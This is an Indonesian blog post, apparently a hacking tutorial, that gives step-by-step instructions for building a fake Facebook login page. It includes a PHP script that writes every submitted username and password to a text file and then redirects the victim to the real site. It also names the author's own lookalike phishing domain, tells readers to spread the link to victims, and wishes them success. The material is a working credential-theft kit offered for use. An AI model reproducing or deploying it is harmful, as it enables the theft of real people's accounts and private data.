Cara Mudah Phising Facebook

Pada teknik yang satu ini, modus operandinya adalah berusaha membuat seseorang mengunjungi situs yang salah sehingga memberikan informasi rahasia berupa username dan password maupun hal lainnya. Umumnya, pelaku membuat situs yang memiliki nama domain mirip dengan aslinya. Istilah Phising identik dengan Web Spoofing, DNS Spoofing, dan Pharming. Teknik phising ini juga dikenal dengan sebuatan teknik fake login, dimana seserang login dihalaman yang bukan sebenarnya.
Cara kerja phising adalah, seseorang memasukkan username dan password dari sebuah halaman login palsu, username dan password tersebut akan terekam dan dikirim ke pembuat halaman login palsu tersebut.
Sebagai contoh kasus, saya akan menggunakan facebook. Berikut ini langkah teknisnya :
1.Buka http://www.facebook.com/login.php
2.Klik kanan lalu klik View page source atau lihat kode sumber laman
3.Copy dan paste script yang muncul pada notepad
4.Cari Kode "action=" (tanpa tanda kutip) dengan munggunakan [CTRL+F] untuk kita modifikasi.
5.Pada action="http://login.facebook.com/login.php", ubahlah menjadi action="secret.php kemudian ubah juga method="post" menjadi method="get" .
6.Simpan file tersebut dengan nama index.php
7.Sekarang buka lembaran notepad yang baru, dan isikan script berikut :
<?php
header ("location: http://www.facebook.com/login.php");
$handle = fopen ("pass.txt", "a");
foreach ($_GET as $variable => $value) {
fwrite ($handle, $variable);
fwrite ($handle, "=");
fwrite ($handle, $value);
fwrite ($handle, "\r\n");
}
fwrite ($handle, "\r\n");
fclose ($handle);
exite;
?>
8.Simpan dengan nama file secret.php
9.Buka notepad lagi dan biarkan isinya kosong, dan simpan dengan nama pass.txt
10.Selanjutnya upload ketiga file tersebut "index.php, secret.php, pass.txt" ke dalam website hosting anda.
11.Setelah selesai di upload, sekarang anda sudah berhasil memiliki sebuah halaman phising facebook.

Ini adalah halaman phising facebook milik saya : http://pacebook.id1945.com/
Tugas anda sekarang adalah menyebarkan link supaya orang bersedia membuka link yang berisikan halaman facebook palsu tersebut. Apabila ada orang yang mengaksesnya dan mencoba login dari halaman tersebut, yang muncul adalah halaman facebook yang asli yang menyatakan bahwa password yang di masukkan salah.
Sewaktu seseorang memasukkan password pada halaman tersebut, password akan terkirim kedalam file pass.txt yang telah anda buat sebelumnya. Berikut salah satu contoh hasil tangkapan password yang saya peroleh :
Oke, sampai disini dulu, jika ada yang ingin ditanyakan silahkan berkoentar. Semoga sukses dengan halaman phising anda sendiri .

3 comments:

Copy Paste Merupkan Pencurian Harta intelektual, Untuk itu jika Anda Ingin Copy Paste Silahkan Mencantumkan Sumbernya. Terimakasih